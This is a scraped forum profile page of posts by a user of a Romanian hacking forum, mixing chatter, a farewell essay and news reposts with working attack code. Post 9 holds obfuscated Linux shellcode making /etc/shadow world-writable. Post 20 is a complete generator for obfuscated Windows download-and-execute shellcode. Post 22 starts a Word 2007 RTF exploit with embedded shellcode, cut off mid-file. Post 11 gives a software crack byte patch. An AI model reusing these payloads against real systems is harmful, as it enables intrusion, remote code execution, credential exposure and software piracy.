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Everything posted by Kalashnikov.

  1. Am observat c? se tot speculeaz? faptul c? downtime-ul se datoreaz? cercet?rilor penale din ultimul timp. 1. Fals. Probleme de hardware; 2. Cercet?rile respective, dup? cum scrie pân? ?i în diversele articole disponibile online, sunt asupra celor care comercializeaz? materialele desc?rcate; 3. B?nuiesc c? v-a?i dat seam? pân? acum, dar am s-o zic, atâta timp cât sta?i cumin?i în banca voastr? (nu vinde?i ce desc?rca?i), nu o s? se lege nimeni de voi. A?a c? am s? v? rog frumos s? NU MAI INDUCE?I LUMEA ÎN EROARE!
  2. O sa revina ca de obicei filelist
  3. Acum comand pizza pentru adresa aia + paste
  4. (articol salvat de pe fostul blog rst, este foarte interesant si merita citit) Am avut salvata o foarte mare parte din acest articol in pc de ceva vreme dar nu am reusit niciodata sa ii dau “paste” pe blogul personal. Mi-ar parea rau sa stiu ca nu l-am publicat niciodata mai ales ca ultimii ani din viata mea s-au bazat pe aceasta gandire si mi se pare un articol perfect ce poate tine loc de “adio”. Orice organism evolueaza sau dispare. De-a lungul timpului am facut cu totii greseala de a limita totul la nivel planetar, la nivel social, la nivel de credinta si la nivel de stiinta, omitand de fiecare data sa consideram intreaga noastra planeta o simpla celula a unui organism viu. Suntem niste nimicuri cu o impresie mult prea buna despre specia noastra. Suntem niste nimicuri care am facut si vom face aceeasi greseala de a cataloga in mod eronat ca fiind “rau” sau “neplacut” orice nu se incadreaza in tiparele sociale impuse. Am fost si vom mai fi mult timp de azi inainte cei care vor distruge alte specii pentru ca noi ne consideram superiori si mai importanti decat orice altceva. Am hartuit si vom mai hartui in continuare oamenii pe criterii de culoare, nationalitate, religie, preferinte sexuale. Incercam si de multe ori reusim sa implementam diferente acolo unde nu sunt si omitem sa ne gandim la cel mai simplu si important aspect al vietii noastre. Existam ca sa evoluam. Evolutia in cazul speciei noastre a luat-o pe un fagas foarte diferit de ceea ce impune natura, un fagas ce probabil se va dovedi total gresit si distructiv. Investim toate resursele noastre pentru a deveni mai avuti, mai importanti d.p.d.v. social, mai inteligenti, cu mai mult timp liber pentru activitatile sociale, dar in acelasi timp totul tinde spre comoditate. Evolutia nu se rezuma doar la inteligenta. Pentru a supravietui ca specie trebuie sa ne adaptam mediului inconjurator nu sa il modificam dupa bunul plac. Construim case si blocuri, dezvoltam masini, roboti industriali, aparate de spalat vase, pastile de marire a potentei, ne dam copiii pe mana bonelor pentru ca nu mai avem timp sa ne ocupam de ei dar ii tinem departe de cataratul in copaci pentru a preveni accidentele, cumparam toate alimentele de-a gata fie ca sunt bune sau nu si am renuntat la vanat pentru ca putem cumpara din orice supermarket oricata carne ne pofteste inima. Suntem o specie de consumatori comozi ce intr-adevar isi dezvolta in permanenta inteligenta dar care in acelasi timp nici nu se gandesc ca speciile care supravietuiesc unui posibil cataclism planetar nu au mare nevoie de inteligenta ci de un organism puternic gata sa se modifice dupa necesitati. Nu vom mai atinge niciodata acel prag de dezvoltare fizica pentru ca acum ne miscam cururile pline de KFC si McDonalds doar pe scaunul masinii si tragem de fiare la salile de forta in loc sa ne dezvoltam corpul luand contact direct cu natura. Nu vom supravietui ca specie cand multi dintre noi habar nu avem cum se planteaza niste legume pentru ca am fost obisnuiti sa avem totul in rafturile magazinelor. Nu ne vom putea adapta unor conditii vitrege ce ne priveaza de tehnologie cand restul speciilor ce au evoluat in mod natural vor deveni pradatori iar noi vanat. Ne consideram a fi cei mai puternici cand de fapt in afara de intelect si tehnologie nu excelam prin absolut nimic in fata altor specii ci din contra suntem mai sensibili la schimbarile de mediu si foarte fragili ca organisme in comparatie cu alte specii de pe planeta asta. Nu va lasati condusi de societate si de religii. Societatea in care traim si tehnologia sunt cele mai mari piedici ale umanitatii in calea evolutiei naturale, iar religiile sunt produsul unor societati vechi de mii de ani ai caror conducatori aveau nevoie de o scuza pentru a supune masele de salbatici. Nu evolutia intelectului ne-a facut sa dezvoltam societatea si tehnologia ci dorinta noastra de a avea o viata comoda si mai lunga decat era programata in genele noastre. Nu stiu cum sa explic exact si nu sunt un geniu ca sa afirm ca am descoperit rostul nostru in viata, dar oare s-a gandit cineva ca nemurirea la care viseaza omenirea inca de la inceputurile ei nu se gaseste in stiinta si medicina ci in evolutia NATURALA nu in cea industrializata? Toate fiintele sunt echivalentul a ceea ce unii dintre voi numesc Dumnezeu, altii numesc Allah sau Elohim. Avem puterea de a da viata asa cum avem puterea de a lua viata. Putem influenta intreg destinul unor organisme fie ele oameni, plante sau animale asa cum si alte organisme au un rol decisiv in viata noastra. Suntem propriile noastre zeitati, creatori dar si ingeri ai mortii. Asta ne face egali, nu doar pe noi oamenii intre noi ci pe noi oamenii cu restul organismelor vii de pe planeta. Este pacat cand ma uit in jur si realizez ca oamenii cauta fericirea acolo unde nu o vor gasi niciodata. Fericirea consta in a te bucura cu adevarat de lucrurile simple ce te inconjoara si care nu costa nimic. Miscati-va degetele mainilor si ganditi-va cat de minunat este ca un simplu impuls electric pornit de la creier a generat acel lucru. Bucurati-va de zilele insorite in care adie un vant racoros ce va revigoreaza intreg organismul. Ascultati sunetul produs de fosnetul frunzelor si uitati-va la cerul instelat. A realiza cu adevarat care este frumusetea naturii ce te inconjoara si din care faci si tu parte iti va aduce pana la urma fericirea pe care o vei cauta zadarnic in bani si statutul social. Restul este doar supravietuire. Multi m-au intrebat cum am reusit sa duc atatea experimente sociale pana la capat, iar aici nu vorbesc despre ceea ce am prezentat pe blog ci despre toate draciile pe care le-am facut departe de ochii lumii in cercuri restranse. Este simplu. Am realizat ca traim intr-o societate defecta ce functioneaza dupa anumite reguli. Cand modifici o singura cifra din ecuatie rezultatul va fi total diferit. Cand inveti matematica sociala lumea se invarte dupa regulile impuse de matematician. Asta inseamna ca trebuie sa te integrezi in acea societate, sa gasesti tiparele categoriilor de oameni si sa aplici formula necesara pentru fiecare tipar in parte pana ajungi la rezultatul dorit. Acum luati in considerare aceste lucruri si faceti comparatie cu puterea pe care o au “matematicienii” care schimba tot timpul cifrele ecuatiei pentru a controla societatea. Poate asa veti realiza cat de vulnerabili suntem. De ce renunt? Pentru ca imi caut coltul meu de Eden in care sa nu mai am contact cu turmele de oi dornice sa fie ceva inutil pentru lumea asta. Vreau sa ma detasez de uratenia si tristetea care ne inconjoara si care ne acapareaza fie ca vrem fie ca nu. De ceva timp am inceput sa am un venit stabil deloc neglijabil, dar am ajuns in acest punct de-abia atunci cand am realizat cu adevarat cat de irelevanti sunt banii pentru fericirea mea si cand am inteles care este formula ce ii face fericiti pe oamenii limitati de regulile impuse de o societate bolnava. Lumea virtuala va deveni in urmatorii ani mult mai murdara decat societatea in care traim si nu va compensa niciodata frumusetea vietii reale. Imi doresc doar o familie si liniste. Este tot ceea ce imi trebuie pentru a fi fericit. Restul… il puteti lua voi. Va doresc o viata frumoasa.
  5. 100% e gasit pe google, sau luat de la altu si editat !
  6. Multi bani, depinde cum te folosesti de platforma .
  7. Am cumparat de la el, totul a decurs bine.
  8. The Innovative Technology Partnerships Office at NASA's Goddard Space Flight Center in Greenbelt, Maryland, announced the release of its core Flight System (cFS) Application Suite to the public. The cFS application suite is composed of 12 individual Command and Data Handling (C&DH) flight software applications that together create a reusable library of common C&DH functions. The cFS application suite allows developers to rapidly configure and deploy a significant portion of the C&DH software system for new missions, test platforms and prototypes, resulting in reduced schedule and cost. The cFS framework takes advantage of a rich heritage of successful NASA Goddard flight software efforts and addresses the challenges of rapidly increasing software development costs and schedules due to constant changes and advancements in hardware. Flight software complexity is expected to increase dramatically in coming years and the cFS provides a means to manage the growth and accommodate changes in flight system designs. The cFS is currently being used by the Core Observatory of NASA’s Global Precipitation Measurement (GPM) mission, launched on Feb. 27, 2014, from Tanegashima Space Center in Japan, and it has also been used by NASA's Ames Research Center in Moffett Field, California, on their most recent mission, the NASA Lunar Atmosphere and Dust Environment Explorer (LADEE), which launched Sept. 6, 2013. Other centers such as NASA's Marshall Space Flight Center in Huntsville, Alabama, NASA's Glenn Research Center in Cleveland, Ohio, and NASA's Johnson Space Center in Houston are currently using the cFS as well. The core Flight Executive (cFE) and the Operating System Abstraction Library (OSAL) are two cFS components previously released as open source. These two components provide a platform-independent application runtime environment. The 12 applications in this release provide C&DH functionality common to most spacecraft Flight Software (FSW) systems. This means the current suite of cFS open source applications now provide a complete FSW system including a layered architecture with user-selectable and configurable features. These architectural features coupled with an implementation targeted for embedded software platforms makes the cFS suitable for reuse on any number of flight projects and/or embedded software systems at very significant cost savings. Each component in the system is a separate loadable file and are available to download free of cost at the links listed in the table. The complete cFS software suite will fully support the cFS user community and future generations of cFS spacecraft platforms and configurations. The cFS community expects the number of reusable applications to continue to grow as the user community expands. here we go -> NASA Goddard Releases Open Source Core Flight Software System Application Suite to Public | NASA
  9. /* * Linux x86 - execve chmod 0777 /etc/shadow * Obfuscated version - 84 bytes * Original: http://shell-storm.org/shellcode/files/shellcode-828.php * Author: xmgv * Details: https://xmgv.wordpress.com/2015/03/13/slae-6-polymorphic-shellcode/ */ /* global _start section .text _start: sub edx, edx push edx mov eax, 0xb33fb33f sub eax, 0x3bd04ede push eax jmp short two end: int 0x80 four: push edx push esi push ebp push ebx mov ecx, esp push byte 0xc pop eax dec eax jmp short end three: push edx sub eax, 0x2c3d2dff push eax mov ebp, esp push edx add eax, 0x2d383638 push eax sub eax, 0x013ffeff push eax sub eax, 0x3217d6d2 add eax, 0x31179798 push eax mov ebx, esp jmp short four two: sub eax, 0x0efc3532 push eax sub eax, 0x04feca01 inc eax push eax mov esi, esp jmp short three */ #include <stdio.h> #include <string.h> unsigned char code[] = "\x29\xd2\x52\xb8\x3f\xb3\x3f\xb3\x2d\xde\x4e\xd0\x3b\x50\xeb\x33\xcd\x80" "\x52\x56\x55\x53\x89\xe1\x6a\x0c\x58\x48\xeb\xf2\x52\x2d\xff\x2d\x3d\x2c" "\x50\x89\xe5\x52\x05\x38\x36\x38\x2d\x50\x2d\xff\xfe\x3f\x01\x50\x2d\xd2" "\xd6\x17\x32\x05\x98\x97\x17\x31\x50\x89\xe3\xeb\xcf\x2d\x32\x35\xfc\x0e" "\x50\x2d\x01\xca\xfe\x04\x40\x50\x89\xe6\xeb\xca"; int main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); }
  10. ( https://rstforums.com/forum/showgroups.php ) Probabil ati uitat sa il adaugati si pe flama, ahead, elias
  11. NEW UPDATE 3082 X64 Find : 85 C0 0F 94 C0 88 05 5E 4C 44 Replace: 90 90 90 90 90 88 05 5E 4C 44 license: explicare crack:
  12. https://rstforums.com/forum/99302-amazons-twitch-hacked-caves-angry-user-demands-secure-passwords.rst Nu mai face posturi similare cu o tema care exista deja pe forum .
  13. In orice domeniu daca vrei sa fii bun trebuie sa cauti critice nu laude !!
  14. Te rog sa nu iti faci magazin it daca nu ai oameni capabili, eu mi-am dus laptop-ul la un service, dupa am mai fost de vreo 5 ori cu el la sfarsit mi-au spus ca ei nu se ocupa cu laptop-uri si mi-au dat bani inapoi . Timpul inseamna bani !
  15. When a company is breached, the typical reaction is to increase security across the board. But Twitch, the Amazon-owned game streaming company, has decided to reduce the minimum number of characters in user passwords, thereby allowing users to have less secure logins, in response to customer complaints. The attack was announced yesterday on a company blog, whilst emails were also sent to concerned users. There’s little detail on the extent of the attack; Twitch simply said all user passwords were to be reset after it detected possible unauthorized access to some Twitch user account information. According to the email sent to users, some cryptographic protections were used on passwords, but it wasn’t clear how strong they were. And it said it was possible passwords could have been captured in plain text by malicious code when users logged into the site on 3 March. Various kinds of data could have been compromised, including credit card information, in particular card type, a truncated card number and the expiration date. Usernames and associated email addresses, passwords, the last IP address users logged in from, phone number, address and date of birth were also potentially stolen. With all that information, a hacker would have a good chance of stealing a victim’s identity. Users started to complain en masse across Twitch’s social networks, however. Some said they couldn’t remember their password, others said when they tried to change their passwords to anything less than 20 characters they weren’t allowed, due to the site’s restrictions. Texan Twitch customer Corbin Ellis told the company on their Facebook page that “if users want to use bad passwords, that’s their problem, not yours”. Twitch caved to customer demands, announcing it would reduce the limit on minimum password length to eight characters minimum. Web security expert Troy Hunt told FORBES more than eight was surprisingly restrictive. “But what’s disheartening about this is that users have apparently baulked at creating passwords longer than eight characters so are clearly not getting the message on what constitutes a strong ‘secret’.” Authentication expert Per Thorsheim said it didn’t make sense to lower the length requirement after a breach. “I’d say on the contrary in many cases. In this specific case they have dramatically lowered their requirements. From a security perspective this could be justified by new and better ways of sending, [encrypting] and storing your passwords.” If any more evidence was needed that the username-password paradigm is a flawed form of authentication, the Twitch breach has provided. sursa: Amazon's Twitch Hacked, Caves To Angry User Demands For Less Secure Passwords - Forbes si-au cam luat la mumu twitch...
  16. Tre muncit la blog nu doar copy paste + nu ai cum sa pacalesti google ca e continut unic...
  17. please donate .biz by rafaël rozendaal, 2011 ))))))))))))))))) hahahahahahahaha
  18. The Useless Web si cel mai tare prins de mine The finger, deal with it. )))))))))))))))))))
  19. La multi ani "em the great" .
  20. #Title: Obfuscated Shellcode Windows x86/x64 Download And Execute [use PowerShell] - Generator#length: Dynamic ! depend on url and filename #Date: 20 January 2015 #Author: Ali Razmjoo #tested On: Windows 7 x64 ultimate #WinExec => 0x77b1e695 #ExitProcess => 0x77ae2acf #==================================== #Execute : #powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe', 'D:\Ali.exe')};D:\Ali.exe" #==================================== #Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com'] #Thanks to my friends , Dariush Nasirpour and Ehsan Nezami #################################################### #How it work ? ''' C:\Users\Ali\Desktop>python "Windows x86 Download And Execute.py" Enter url Example: http://z3r0d4y.com/file.exe Enter:http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe Enter filename Example: D:\file.exe Enter:C:\Ali.exe C:\Users\Ali\Desktop>nasm -f elf shellcode.asm -o shellcode.o C:\Users\Ali\Desktop>objdump -D shellcode.o shellcode.o: file format elf32-i386 Disassembly of section .text: 00000000 <.text>: 0: 31 c0 xor %eax,%eax 2: 50 push %eax 3: 68 41 41 65 22 push $0x22654141 8: 58 pop %eax 9: c1 e8 08 shr $0x8,%eax c: c1 e8 08 shr $0x8,%eax f: 50 push %eax 10: b8 34 47 0b 4d mov $0x4d0b4734,%eax 15: bb 5d 69 6e 35 mov $0x356e695d,%ebx 1a: 31 d8 xor %ebx,%eax 1c: 50 push %eax 1d: b8 43 32 10 22 mov $0x22103243,%eax 22: bb 79 6e 51 4e mov $0x4e516e79,%ebx 27: 31 d8 xor %ebx,%eax 29: 50 push %eax 2a: b8 60 05 42 32 mov $0x32420560,%eax 2f: bb 49 78 79 71 mov $0x71797849,%ebx 34: 31 d8 xor %ebx,%eax 36: 50 push %eax 37: b8 0f 1c 2c 14 mov $0x142c1c0f,%eax 3c: bb 6a 64 49 33 mov $0x3349646a,%ebx 41: 31 d8 xor %ebx,%eax 43: 50 push %eax 44: b8 07 3e 0b 40 mov $0x400b3e07,%eax 49: bb 46 52 62 6e mov $0x6e625246,%ebx 4e: 31 d8 xor %ebx,%eax 50: 50 push %eax 51: b8 44 0a 78 07 mov $0x7780a44,%eax 56: bb 63 49 42 5b mov $0x5b424963,%ebx 5b: 31 d8 xor %ebx,%eax 5d: 50 push %eax 5e: b8 0f 16 4b 0d mov $0xd4b160f,%eax 63: bb 6a 31 67 2d mov $0x2d67316a,%ebx 68: 31 d8 xor %ebx,%eax 6a: 50 push %eax 6b: b8 18 62 5c 1f mov $0x1f5c6218,%eax 70: bb 61 4c 39 67 mov $0x67394c61,%ebx 75: 31 d8 xor %ebx,%eax 77: 50 push %eax 78: b8 1b 2d 1e 1f mov $0x1f1e2d1b,%eax 7d: bb 6b 58 6a 6b mov $0x6b6a586b,%ebx 82: 31 d8 xor %ebx,%eax 84: 50 push %eax 85: b8 45 40 41 66 mov $0x66414045,%eax 8a: bb 3d 78 77 49 mov $0x4977783d,%ebx 8f: 31 d8 xor %ebx,%eax 91: 50 push %eax 92: b8 02 1f 4b 45 mov $0x454b1f02,%eax 97: bb 6d 6b 38 6a mov $0x6a386b6d,%ebx 9c: 31 d8 xor %ebx,%eax 9e: 50 push %eax 9f: b8 24 3e 19 32 mov $0x32193e24,%eax a4: bb 45 4e 6a 5a mov $0x5a6a4e45,%ebx a9: 31 d8 xor %ebx,%eax ab: 50 push %eax ac: b8 00 5e 3a 35 mov $0x353a5e00,%eax b1: bb 6c 73 49 5b mov $0x5b49736c,%ebx b6: 31 d8 xor %ebx,%eax b8: 50 push %eax b9: b8 1f 37 40 24 mov $0x2440371f,%eax be: bb 6d 52 32 41 mov $0x4132526d,%ebx c3: 31 d8 xor %ebx,%eax c5: 50 push %eax c6: b8 2e 35 68 31 mov $0x3168352e,%eax cb: bb 5a 4c 45 41 mov $0x41454c5a,%ebx d0: 31 d8 xor %ebx,%eax d2: 50 push %eax d3: b8 48 1e 1c 15 mov $0x151c1e48,%eax d8: bb 67 6e 69 61 mov $0x61696e67,%ebx dd: 31 d8 xor %ebx,%eax df: 50 push %eax e0: b8 26 28 0d 5d mov $0x5d0d2826,%eax e5: bb 4f 45 62 33 mov $0x3362454f,%ebx ea: 31 d8 xor %ebx,%eax ec: 50 push %eax ed: b8 20 57 1d 45 mov $0x451d5720,%eax f2: bb 47 78 63 36 mov $0x36637847,%ebx f7: 31 d8 xor %ebx,%eax f9: 50 push %eax fa: b8 04 6a 24 3b mov $0x3b246a04,%eax ff: bb 77 44 4b 49 mov $0x494b4477,%ebx 104: 31 d8 xor %ebx,%eax 106: 50 push %eax 107: b8 18 0f 0a 32 mov $0x320a0f18,%eax 10c: bb 6c 6e 78 47 mov $0x47786e6c,%ebx 111: 31 d8 xor %ebx,%eax 113: 50 push %eax 114: b8 7d 18 3c 27 mov $0x273c187d,%eax 119: bb 52 6c 5d 55 mov $0x555d6c52,%ebx 11e: 31 d8 xor %ebx,%eax 120: 50 push %eax 121: b8 03 44 60 60 mov $0x60604403,%eax 126: bb 77 34 5a 4f mov $0x4f5a3477,%ebx 12b: 31 d8 xor %ebx,%eax 12d: 50 push %eax 12e: b8 47 6b 1f 20 mov $0x201f6b47,%eax 133: bb 6f 4c 77 54 mov $0x54774c6f,%ebx 138: 31 d8 xor %ebx,%eax 13a: 50 push %eax 13b: b8 2a 5e 2b 20 mov $0x202b5e2a,%eax 140: bb 6c 37 47 45 mov $0x4547376c,%ebx 145: 31 d8 xor %ebx,%eax 147: 50 push %eax 148: b8 59 07 12 0e mov $0xe120759,%eax 14d: bb 35 68 73 6a mov $0x6a736835,%ebx 152: 31 d8 xor %ebx,%eax 154: 50 push %eax 155: b8 01 59 11 2c mov $0x2c115901,%eax 15a: bb 45 36 66 42 mov $0x42663645,%ebx 15f: 31 d8 xor %ebx,%eax 161: 50 push %eax 162: b8 22 22 4e 5a mov $0x5a4e2222,%eax 167: bb 4c 56 67 74 mov $0x7467564c,%ebx 16c: 31 d8 xor %ebx,%eax 16e: 50 push %eax 16f: b8 00 37 1b 48 mov $0x481b3700,%eax 174: bb 43 5b 72 2d mov $0x2d725b43,%ebx 179: 31 d8 xor %ebx,%eax 17b: 50 push %eax 17c: b8 4a 1f 22 13 mov $0x13221f4a,%eax 181: bb 64 48 47 71 mov $0x71474864,%ebx 186: 31 d8 xor %ebx,%eax 188: 50 push %eax 189: b8 6a 23 03 18 mov $0x1803236a,%eax 18e: bb 4a 6d 66 6c mov $0x6c666d4a,%ebx 193: 31 d8 xor %ebx,%eax 195: 50 push %eax 196: b8 2d 54 57 1c mov $0x1c57542d,%eax 19b: bb 47 31 34 68 mov $0x68343147,%ebx 1a0: 31 d8 xor %ebx,%eax 1a2: 50 push %eax 1a3: b8 4e 15 36 5a mov $0x5a36154e,%eax 1a8: bb 39 38 79 38 mov $0x38793839,%ebx 1ad: 31 d8 xor %ebx,%eax 1af: 50 push %eax 1b0: b8 59 7f 1f 04 mov $0x41f7f59,%eax 1b5: bb 79 57 51 61 mov $0x61515779,%ebx 1ba: 31 d8 xor %ebx,%eax 1bc: 50 push %eax 1bd: b8 47 56 1d 2f mov $0x2f1d5647,%eax 1c2: bb 65 70 3d 54 mov $0x543d7065,%ebx 1c7: 31 d8 xor %ebx,%eax 1c9: 50 push %eax 1ca: b8 2c 18 08 54 mov $0x5408182c,%eax 1cf: bb 4d 76 6c 74 mov $0x746c764d,%ebx 1d4: 31 d8 xor %ebx,%eax 1d6: 50 push %eax 1d7: b8 5a 34 58 1b mov $0x1b58345a,%eax 1dc: bb 39 5b 35 76 mov $0x76355b39,%ebx 1e1: 31 d8 xor %ebx,%eax 1e3: 50 push %eax 1e4: b8 3f 0f 4b 41 mov $0x414b0f3f,%eax 1e9: bb 53 63 6b 6c mov $0x6c6b6353,%ebx 1ee: 31 d8 xor %ebx,%eax 1f0: 50 push %eax 1f1: b8 4a 1e 59 0b mov $0xb591e4a,%eax 1f6: bb 38 6d 31 6e mov $0x6e316d38,%ebx 1fb: 31 d8 xor %ebx,%eax 1fd: 50 push %eax 1fe: b8 49 2b 16 2a mov $0x2a162b49,%eax 203: bb 39 44 61 4f mov $0x4f614439,%ebx 208: 31 d8 xor %ebx,%eax 20a: 50 push %eax 20b: 89 e0 mov %esp,%eax 20d: bb 41 41 41 01 mov $0x1414141,%ebx 212: c1 eb 08 shr $0x8,%ebx 215: c1 eb 08 shr $0x8,%ebx 218: c1 eb 08 shr $0x8,%ebx 21b: 53 push %ebx 21c: 50 push %eax 21d: bb 95 e6 b1 77 mov $0x77b1e695,%ebx 222: ff d3 call *%ebx 224: bb cf 2a ae 77 mov $0x77ae2acf,%ebx 229: ff d3 call *%ebx C:\Users\Ali\Desktop> #you have your shellcode now ======================================= shellcode.c #include <stdio.h> #include <string.h> int main(){ unsigned char shellcode[]= "\x31\xc0\x50\x68\x41\x41\x65\x22\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb8\x34\x47\x0b\x4d\xbb\x5d\x69\x6e\x35\x31\xd8\x50\xb8\x43\x32\x10\x22\xbb\x79\x6e\x51\x4e\x31\xd8\x50\xb8\x60\x05\x42\x32\xbb\x49\x78\x79\x71\x31\xd8\x50\xb8\x0f\x1c\x2c\x14\xbb\x6a\x64\x49\x33\x31\xd8\x50\xb8\x07\x3e\x0b\x40\xbb\x46\x52\x62\x6e\x31\xd8\x50\xb8\x44\x0a\x78\x07\xbb\x63\x49\x42\x5b\x31\xd8\x50\xb8\x0f\x16\x4b\x0d\xbb\x6a\x31\x67\x2d\x31\xd8\x50\xb8\x18\x62\x5c\x1f\xbb\x61\x4c\x39\x67\x31\xd8\x50\xb8\x1b\x2d\x1e\x1f\xbb\x6b\x58\x6a\x6b\x31\xd8\x50\xb8\x45\x40\x41\x66\xbb\x3d\x78\x77\x49\x31\xd8\x50\xb8\x02\x1f\x4b\x45\xbb\x6d\x6b\x38\x6a\x31\xd8\x50\xb8\x24\x3e\x19\x32\xbb\x45\x4e\x6a\x5a\x31\xd8\x50\xb8\x00\x5e\x3a\x35\xbb\x6c\x73\x49\x5b\x31\xd8\x50\xb8\x1f\x37\x40\x24\xbb\x6d\x52\x32\x41\x31\xd8\x50\xb8\x2e\x35\x68\x31\xbb\x5a\x4c\x45\x41\x31\xd8\x50\xb8\x48\x1e\x1c\x15\xbb\x67\x6e\x69\x61\x31\xd8\x50\xb8\x26\x28\x0d\x5d\xbb\x4f\x45\x62\x33\x31\xd8\x50\xb8\x20\x57\x1d\x45\xbb\x47\x78\x63\x36\x31\xd8\x50\xb8\x04\x6a\x24\x3b\xbb\x77\x44\x4b\x49\x31\xd8\x50\xb8\x18\x0f\x0a\x32\xbb\x6c\x6e\x78\x47\x31\xd8\x50\xb8\x7d\x18\x3c\x27\xbb\x52\x6c\x5d\x55\x31\xd8\x50\xb8\x03\x44\x60\x60\xbb\x77\x34\x5a\x4f\x31\xd8\x50\xb8\x47\x6b\x1f\x20\xbb\x6f\x4c\x77\x54\x31\xd8\x50\xb8\x2a\x5e\x2b\x20\xbb\x6c\x37\x47\x45\x31\xd8\x50\xb8\x59\x07\x12\x0e\xbb\x35\x68\x73\x6a\x31\xd8\x50\xb8\x01\x59\x11\x2c\xbb\x45\x36\x66\x42\x31\xd8\x50\xb8\x22\x22\x4e\x5a\xbb\x4c\x56\x67\x74\x31\xd8\x50\xb8\x00\x37\x1b\x48\xbb\x43\x5b\x72\x2d\x31\xd8\x50\xb8\x4a\x1f\x22\x13\xbb\x64\x48\x47\x71\x31\xd8\x50\xb8\x6a\x23\x03\x18\xbb\x4a\x6d\x66\x6c\x31\xd8\x50\xb8\x2d\x54\x57\x1c\xbb\x47\x31\x34\x68\x31\xd8\x50\xb8\x4e\x15\x36\x5a\xbb\x39\x38\x79\x38\x31\xd8\x50\xb8\x59\x7f\x1f\x04\xbb\x79\x57\x51\x61\x31\xd8\x50\xb8\x47\x56\x1d\x2f\xbb\x65\x70\x3d\x54\x31\xd8\x50\xb8\x2c\x18\x08\x54\xbb\x4d\x76\x6c\x74\x31\xd8\x50\xb8\x5a\x34\x58\x1b\xbb\x39\x5b\x35\x76\x31\xd8\x50\xb8\x3f\x0f\x4b\x41\xbb\x53\x63\x6b\x6c\x31\xd8\x50\xb8\x4a\x1e\x59\x0b\xbb\x38\x6d\x31\x6e\x31\xd8\x50\xb8\x49\x2b\x16\x2a\xbb\x39\x44\x61\x4f\x31\xd8\x50\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\x95\xe6\xb1\x77\xff\xd3\xbb\xcf\x2a\xae\x77\xff\xd3"; fprintf(stdout,"Length: %d\n\n",strlen(shellcode)); (*(void(*)()) shellcode)(); } ======================================= C:\Users\Ali\Desktop>gcc shellcode.c -o shellcode.exe C:\Users\Ali\Desktop>shellcode.exe Length: 173 C:\Users\Ali\Desktop> #notice : when program exit, you must wait 2-3 second , it will finish download and execute file after 2-3 second ''' import random,binascii chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz123456789=[]-' p1 = '''xor eax,eax push eax ''' p2 = ''' mov eax,esp mov ebx,0x01414141 shr ebx,0x08 shr ebx,0x08 shr ebx,0x08 push ebx push eax mov ebx,0x77b1e695 call ebx mov ebx,0x77ae2acf call ebx ''' sen1 = str(raw_input('Enter url\nExample: http://z3r0d4y.com/file.exe \nEnter:')) sen1 = sen1.rsplit() sen1 = sen1[0] sen2 = str(raw_input('Enter filename\nExample: D:\\file.exe\nEnter:')) sen2 = sen2.rsplit() sen2 = sen2[0] sen = '''powershell -command "& { (New-Object Net.WebClient).DownloadFile('%s', '%s')};%s"''' %(sen1,sen2,sen2) m = 0 for word in sen: m += 1 m = m - 1 stack = '' while(m>=0): stack += sen[m] m -= 1 stack = stack.encode('hex') skip = 1 if len(stack) % 8 == 0: skip = 0 if skip is 1: stack = '00' + stack if len(stack) % 8 == 0: skip = 0 if skip is 1: stack = '00' + stack if len(stack) % 8 == 0: skip = 0 if skip is 1: stack = '00' + stack if len(stack) % 8 == 0: skip = 0 if len(stack) % 8 == 0: zxzxzxz = 0 m = len(stack) / 8 c = 0 n = 0 z = 8 shf = open('shellcode.asm','w') shf.write(p1) shf.close() shf = open('shellcode.asm','a') while(c<m): v = 'push 0x' + stack[n:z] skip = 0 if '0x000000' in v: skip = 1 q1 = v[13:] v = 'push 0x' + q1 + '414141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\nshr eax,0x08\npush eax\n' if '0x0000' in v: skip = 1 q1 = v[11:] v = 'push 0x' + q1 + '4141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\npush eax\n' if '0x00' in v: skip = 1 q1 = v[9:] v = 'push 0x' + q1 + '41' + '\n' + 'pop eax\nshr eax,0x08\npush eax\n' if skip is 1: shf.write(v) if skip is 0: v = v.rsplit() zzz = '' for w in v: if '0x' in w: zzz = str(w) s1 = binascii.b2a_hex(''.join(random.choice(chars) for i in range(4))) s1 = '0x%s'%s1 data = "%x" % (int(zzz, 16) ^ int(s1, 16)) v = 'mov eax,0x%s\nmov ebx,%s\nxor eax,ebx\npush eax\n'%(data,s1) shf.write(v) n += 8 z += 8 c += 1 shf.write(p2) shf.close()
  21. NOTICE FROM chat.freenode.net: *** Looking up your hostname... NOTICE FROM chat.freenode.net: *** Checking Ident NOTICE FROM chat.freenode.net: *** Couldn't look up your hostname NOTICE FROM chat.freenode.net: *** No Ident response Kalashnikov._437 :Erroneous Nickname @Byte-ul fa un regex, dupa ce se logheaza pe forum sa elimine . , - etc
  22. # Title : Microsoft Office Word 2007 - RTF Object Confusion ASLR and DEP bypass # Date : 28/02/2015 # Author : R-73eN # Software : Microsoft Office Word 2007 # Tested : Windows 7 Starter import sys # Windows Message Box / all versions . Thanks to Giuseppe D'amore for the shellcode . shellcode = '31d2b230648b128b520c8b521c8b42088b72208b12807e0c3375f289c703783c8b577801c28b7a2001c731ed8b34af01c645813e4661746175f2817e084578697475e98b7a2401c7668b2c6f8b7a1c01c78b7caffc01c76879746501686b656e42682042726f89e1fe490b31c05150ffd7' #filecontent content="{\\rtf1" content+="{\\fonttbl{\\f0\\fnil\\fcharset0Verdana;}}" content+="\\viewkind4\\uc1\\pard\\sb100\\sa100\\lang9\\f0\\fs22\\par" content+="\\pard\\sa200\\sl276\\slmult1\\lang9\\fs22\\par" content+="{\\object\\objocx" content+="{\\*\\objdata" content+="\n" content+="01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E320000" content+="00000000000000000E0000" content+="\n" content+="D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF09000600000000000000" content+="00000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000" 